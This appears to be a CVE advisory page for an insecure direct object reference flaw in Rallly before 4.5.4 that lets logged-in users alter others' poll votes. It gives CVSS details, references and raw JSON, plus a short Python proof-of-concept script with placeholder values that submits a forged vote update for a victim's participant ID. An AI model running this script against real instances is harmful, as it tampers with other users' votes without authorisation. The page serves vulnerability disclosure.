Security Vulnerability Report
CVE-2025-65028 CVSS 6.5 MEDIUM

CVE-2025-65028

Published: 2025-11-19 18:15:50
Last Modified: 2025-11-25 15:32:31

Description

Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an insecure direct object reference (IDOR) vulnerability allows any authenticated user to modify other participants’ votes in polls without authorization. The backend relies solely on the participantId parameter to identify which votes to update, without verifying ownership or poll permissions. This allows an attacker to alter poll results in their favor, directly compromising data integrity. This issue has been patched in version 4.5.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:* - VULNERABLE
Rallly < 4.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-65028 PoC - Rallly IDOR Vulnerability
# Target: Rallly < 4.5.4
# Vulnerability: IDOR in vote update endpoint

TARGET_URL = "https://vulnerable-rallly-instance.com"
ATTACKER_TOKEN = "attacker_auth_token_here"


def exploit_idor():
    # Step 1: Get the poll ID and list participants
    poll_id = "target_poll_id"

    # Step 2: Identify target participant ID (victim)
    victim_participant_id = "victim_participant_id"

    # Step 3: Craft malicious vote update request
    # The vulnerable endpoint does not verify participant ownership
    update_url = f"{TARGET_URL}/api/votes/{poll_id}"
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json",
    }

    # Modify victim's vote to favor attacker
    payload = {
        "participantId": victim_participant_id,
        "options": ["2025-12-25"],  # Attacker's preferred date
    }

    response = requests.post(update_url, headers=headers, json=payload)

    if response.status_code == 200:
        print("[+] Vote successfully modified!")
        print("[+] Victim's vote has been changed")
    else:
        print(f"[-] Exploitation failed: {response.status_code}")


if __name__ == "__main__":
    exploit_idor()
```

References

https://github.com/lukevella/rallly/releases/tag/v4.5.4 (Release Notes)
https://github.com/lukevella/rallly/security/advisories/GHSA-pchc-v5hg-f5gp (Exploit, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-65028",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-19T18:15:50.203",
    "lastModified": "2025-11-25T15:32:31.413",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an insecure direct object reference (IDOR) vulnerability allows any authenticated user to modify other participants’ votes in polls without authorization. The backend relies solely on the participantId parameter to identify which votes to update, without verifying ownership or poll permissions. This allows an attacker to alter poll results in their favor, directly compromising data integrity. This issue has been patched in version 4.5.4."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-285"},
          {"lang": "en", "value": "CWE-639"},
          {"lang": "en", "value": "CWE-862"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "4.5.4",
                "matchCriteriaId": "05349176-CA4D-4360-A7E1-0EA2D8C24E7E"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/lukevella/rallly/releases/tag/v4.5.4",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/lukevella/rallly/security/advisories/GHSA-pchc-v5hg-f5gp",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```